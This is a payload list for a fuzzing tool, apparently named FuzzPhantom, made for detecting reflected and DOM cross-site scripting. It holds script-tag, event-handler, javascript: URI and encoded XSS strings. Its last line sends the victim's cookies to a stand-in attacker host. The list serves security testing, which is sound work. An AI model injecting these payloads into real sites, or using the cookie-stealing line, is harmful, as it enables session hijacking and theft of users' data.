# FuzzPhantom — XSS Test Payloads
# Reflected and DOM XSS detection
<script>alert(1)</script>
<script>alert('XSS')</script>
<script>confirm(1)</script>
<img src=x onerror=alert(1)>
<img src=x onerror=alert('XSS')>
<svg onload=alert(1)>
<svg/onload=alert(1)>
<body onload=alert(1)>
<input autofocus onfocus=alert(1)>
<select autofocus onfocus=alert(1)>
<textarea autofocus onfocus=alert(1)>
<keygen autofocus onfocus=alert(1)>
<video><source onerror=alert(1)>
<audio src=x onerror=alert(1)>
<details open ontoggle=alert(1)>
<marquee onstart=alert(1)>
javascript:alert(1)
javascript:alert('XSS')
<a href=javascript:alert(1)>click</a>
<iframe src=javascript:alert(1)>
<iframe onload=alert(1)>
'><script>alert(1)</script>
"><script>alert(1)</script>
</script><script>alert(1)</script>
<ScRiPt>alert(1)</sCrIpT>
%3Cscript%3Ealert(1)%3C/script%3E
&lt;script&gt;alert(1)&lt;/script&gt;
<script>alert(String.fromCharCode(88,83,83))</script>
\u003cscript\u003ealert(1)\u003c/script\u003e
<img src=1 href=1 onerror="javascript:alert(1)"></img>
<audio src=1 href=1 onerror="javascript:alert(1)"></audio>
<video src=1 href=1 onerror="javascript:alert(1)"></video>
<body src=1 href=1 onerror="javascript:alert(1)"></body>
<object src=1 href=1 onerror="javascript:alert(1)"></object>
<script>document.location='http://attacker.com/cookie?c='+document.cookie</script>
